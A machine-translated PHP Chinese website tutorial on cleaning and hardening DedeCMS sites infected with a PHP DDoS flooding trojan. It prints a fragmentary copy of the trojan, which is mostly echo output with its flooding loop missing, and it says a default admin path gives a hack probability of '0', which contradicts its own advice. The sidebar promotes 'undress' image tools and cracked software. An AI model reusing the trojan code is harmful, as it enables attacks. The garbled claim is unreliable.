search
HomeCMS TutorialDEDECMSHow dedecms solves DDOS horse-mounting vulnerability

How dedecms solves DDOS horse-mounting vulnerability

How does dedecms solve the DDOS mounting vulnerability?

Dedecms is a well-known PHP open source system in China, and it is also the first choice CMS system for many webmasters to build websites. Its simplicity and ease of use is a major reason for its widespread practicality, and it is precisely because of the open source of dedecms that it has also led to Many hackers have focused on this program, so they have successively researched many dedecms vulnerabilities. As a result, quite a few dedecms websites have been suspended. Some have been warned by the computer room, and serious computer rooms have been forcibly shut down, resulting in huge losses. . Today we will do a more in-depth analysis of this problem and find a solution.

Recommended study: 梦Weavercms

Characteristics of the hooked horse:

Open your own website homepage and you will find it by viewing the source code Many black link codes have been added to your website. The black link code is the simplest and easiest for webmasters to see. It is nothing more than the code for friendly links.

Another characteristic is that when you open a website, you will be prompted by 360 Security that the website has the risk of malware. This type of malware code is usually a frame code or a js code or an image code. Another characteristic is that the website It will suddenly fail to open or open slowly. If you check the traffic, you will find that it takes up a lot of traffic. This means that the traffic is sent out, which is also called a UDP traffic packet attack. The above are the general characteristics of dedecms being hacked. Let’s talk about some practical solutions and preventive measures for website being hacked.

First download the code of the website program to your local computer, use the sinesafe Trojan removal tool to check it, and find that there are many script Trojans in the data/cache/ directory. When you open the Trojan script, you find some unknown PHP codes. , put the code into the sinesafe Trojan tool and conducted an in-depth analysis and found the characteristics of the Trojan. The code is as follows:

The code is as follows:

<?php
set_time_limit(984918);
$host = $_GET[&#39;host&#39;];
$port = $_GET[&#39;port&#39;];
$exec_time = $_GET[&#39;time&#39;];
$Sendlen = 65535;
$packets = 0;
}
echo "================================================
";
echo " <font color=blue>www.phpddos.com
";
echo " SYN Flood 模块
";
echo " 作者:ybhacker
";
echo " 警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font>
";
echo "================================================
";
echo " 攻击包总数:<font color=Red><span class=\"text\">".$packets." 个数据包</span>
</font>";
echo " 攻击总流量:<font color=Red><span class=\"text\">".round(($packets*65*8)/(1024*1024),2)." Mbps</span>
</font>";
echo " 攻击总字节:<font color=Red><span class=\"text\">".time(&#39;h:i:s&#39;)." 字节</span>
</font>";
echo "Packet complete at ".time(&#39;h:i:s&#39;)." with $packets (" .round(($packets*65*8)/(1024*1024),2). " Mbps) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
?>

I found on the Internet that this is a php script for UDP traffic attack Trojan horse, this Trojan horse can achieve the effect of DDoS traffic attack by running with the permission of website script. No server permissions are required. Only then did I understand why the computer room said that my website was always outsourcing. Websites running this script would open slowly, including my website. Now that you have found the problem, you need to solve it quickly. Click Clear Trojan Code to clear it all at once. There are no unfamiliar file names in the Data/cache/ directory. Finally, in order to cure this "stubborn disease", we summarized several solutions and preventive measures:

1. Security settings of the dedecms directory: data/cache/ templets uploads directory settings are readable and writable, but not executable. Include, member, and plus set readable, executable, and non-writable permissions. Since dedecms does not use stored procedures anywhere, you can disable FILE, EXECUTE, and other permissions to perform stored procedures or file operations.

 2. Website program security: This is also the most fundamental precaution. If it is a virtual space, it is recommended to find a professional to do website security maintenance to ensure the safety of the website program. Only a safe website can bring safe and stable customers. source.

 3. Program update: Open the dedecms background to see if there are any updated patches. If so, please update and patch them in time. If your version is very old, I recommend reinstalling the new version because The new versions are relatively safe and are different from the old versions in many places.

4. Backend management directory: dedecms The backend management directory generally defaults to dedecms. Many webmasters never care about this backend address. I am very responsible to tell you that if the managed directory address is the default, you will be hung up. The probability of horse is 0. It is recommended to change the name of the directory to a name that is a combination of numbers and letters.

 5.FTP website management password: It is recommended to change FTP passwords and website management passwords frequently, because many hackers are using brute force to crack passwords, and make the passwords as complex as possible with special symbols and letters.

The above is the detailed content of How dedecms solves DDOS horse-mounting vulnerability. For more information, please follow other related articles on the PHP Chinese website!

Statement
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

Video Face Swap

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Tools

WebStorm Mac version

WebStorm Mac version

Useful JavaScript development tools

mPDF

mPDF

mPDF is a PHP library that can generate PDF files from UTF-8 encoded HTML. The original author, Ian Back, wrote mPDF to output PDF files "on the fly" from his website and handle different languages. It is slower than original scripts like HTML2FPDF and produces larger files when using Unicode fonts, but supports CSS styles etc. and has a lot of enhancements. Supports almost all languages, including RTL (Arabic and Hebrew) and CJK (Chinese, Japanese and Korean). Supports nested block-level elements (such as P, DIV),

EditPlus Chinese cracked version

EditPlus Chinese cracked version

Small size, syntax highlighting, does not support code prompt function

DVWA

DVWA

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is very vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the process of securing web applications, and to help teachers/students teach/learn in a classroom environment Web application security. The goal of DVWA is to practice some of the most common web vulnerabilities through a simple and straightforward interface, with varying degrees of difficulty. Please note that this software

SublimeText3 English version

SublimeText3 English version

Recommended: Win version, supports code prompts!